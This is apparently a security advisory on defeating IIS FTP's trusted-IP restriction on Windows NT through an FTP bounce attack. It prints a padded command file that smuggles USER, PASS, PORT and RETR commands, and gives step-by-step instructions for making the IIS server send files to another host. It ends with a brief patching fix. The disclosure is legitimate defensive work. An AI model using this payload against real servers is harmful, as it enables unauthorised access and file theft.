COMMAND
Internet Information Server
SYSTEMS AFFECTED
Win NT
PROBLEM
"Nemo" made research on by-passing Internet Information Server's
ftp service's security. The Microsoft ftp service, as provided
for by Internet Information Server can be configured to allow
connections from only certain ("trusted") IP addresses. This
paper describes how this security arrangement could be by-passed
depending on the configuration of the remote network.
This is based on a "bounce" attack but it is important to note
that the target ftp server does not have to have the registry
setting "EnablePortAttack" set to 1; in other words the server
doesn't have to be configured to allow an ftp bounce attack. You
do, however, need one ftp server that you run the bounce attack
from. This server has to be included in the range of trusted IP
addresses. This will most likely be an unpatched UNIX server on
the same subnet as your target IIS server.
Basically you are using this server as a platform to log into the
IIS server and steal what files you can. The login process and
other commands are contained in a file called cmds.txt and are
sent to the IIS server using the ftp bounce attack. When a login
occurs this way, because of buffering the ftp service on IIS will
read (or at least look for) a command every 497 characters after
the first character of each command. So cmds.txt will begin with
"user anonymous". 497 characters after the `u' of user IIS will
read the next command. These characters can be garbage.
USER ANONYMOUS
1234567890abcdefghijklmnopqrstuvwxyz1
1234567890abcdefghijklmnopqrstuvwxyz2
1234567890abcdefghijklmnopqrstuvwxyz3
1234567890abcdefghijklmnopqrstuvwxyz4
1234567890abcdefghijklmnopqrstuvwxyz5
1234567890abcdefghijklmnopqrstuvwxyz6
1234567890abcdefghijklmnopqrstuvwxyz7
1234567890abcdefghijklmnopqrstuvwxyz8
1234567890abcdefghijklmnopqrstuvwxyz9
1234567890abcdefghijklmnopqrstuvwxyz0
1234567890abcdefghijklmnopqrstuvwxyzA
1234567890abcdefghijklmnopqrstuvwxyzB
1234567890abcdefghijklmnopqPASS A@HERE
1234567890abcdefghijklmnopqrstuvwxyz1
1234567890abcdefghijklmnopqrstuvwxyz2
1234567890abcdefghijklmnopqrstuvwxyz3
1234567890abcdefghijklmnopqrstuvwxyz4
1234567890abcdefghijklmnopqrstuvwxyz5
1234567890abcdefghijklmnopqrstuvwxyz6
1234567890abcdefghijklmnopqrstuvwxyz7
1234567890abcdefghijklmnopqrstuvwxyz8
1234567890abcdefghijklmnopqrstuvwxyz9
1234567890abcdefghijklmnopqrstuvwxyz0
1234567890abcdefghijklmnopqrstuvwxyzA
1234567890abcdefghijklmnopqrstuvwxyzB
1234567890abcdefghijklmnopqrstPORT 194,126,80,119,105,34
1234567890abcdefghijklmnopqrstuvwxyz1
1234567890abcdefghijklmnopqrstuvwxyz2
1234567890abcdefghijklmnopqrstuvwxyz3
1234567890abcdefghijklmnopqrstuvwxyz4
1234567890abcdefghijklmnopqrstuvwxyz5
1234567890abcdefghijklmnopqrstuvwxyz6
1234567890abcdefghijklmnopqrstuvwxyz7
1234567890abcdefghijklmnopqrstuvwxyz8
1234567890abcdefghijklmnopqrstuvwxyz9
1234567890abcdefghijklmnopqrstuvwxyz0
1234567890abcdefghijklmnopqrstuvwxyzA
1234567890abcdefghijklmnopqrstuvwxyzB
1234567890abcdvRETR FILE.TXT
1234567890----- more garbage
Commands are in upper case here so they stand out. So here's how
the attack would go (scenario):
HostA is a UNIX running an ftp service that has not been
patched against bounce attacks. You can log into this server
anonymously and have write permissions on at least one
directory. HostA's IP address is 123.123.123.120
HostB is an NT server running IIS and allows anonymous
connections but only from IP addresses of the same subnet
range eg 123.123.123.1 to 123.123.123.254. HostB has the IP
address 123.123.123.123.
1.Connect to Host A, login and change to a directory where you
have write permission.
2.Issue the command "quote pasv". The server will respond
saying it is going into passive mode. Note the address and
the port (ADD,ADD,ADD,ADD,PORT,PORT). Enter this value into
your cmds.txt file and save it. Then issue the command
"quote stor file.txt". The session will appear to hang. In
actual fact it is waiting patiently for someone to connected
to its port and send it file.txt.
3.Open another session with Host A. Change to the same
directory and upload cmds.txt.
4.Now issue the command "quote port 123,123,123,123,0,21".
This primes a connection to the target IIS server.
5.Issue the command "quote retr cmds.txt". This causes HostA
to make a connection to HostB and after the 3-way TCP
handshake the contents of cmds.txt are transferred to HostB.
HostB reads the first command USER anonymous. It will reply
saying, "Anonymous access allowed, send identity (e-mail
name) as password." But not that you'll see this. This
message is directed at HostB's TCP port 20 (ftpdata). 497
characters after the letter ‘U' of user the IIS server will
read the next command "PASS a@here". It will reply "user
anonymous logged in". Our next command (497 characters
after the `P' of PASS) is PORT ADD,ADD,ADD,ADD,PORT,PORT.
Note: This does not go against the IIS ftp service's built
in security mechanism that disallows a PORT command if a
different IP address to the clients is used. This will then
set up a connection to the waiting port on Host A that we
set up in step 1. Using the command "RETR file.txt" will
then cause HostB to send file.txt down to HostA and thus you
have by-passed the security setup.
SOLUTION
The obvious resolution to this problem is to exclude the
unpatched-against-an-ftp-bounce-attack server's IP address or
alternatively patch this server.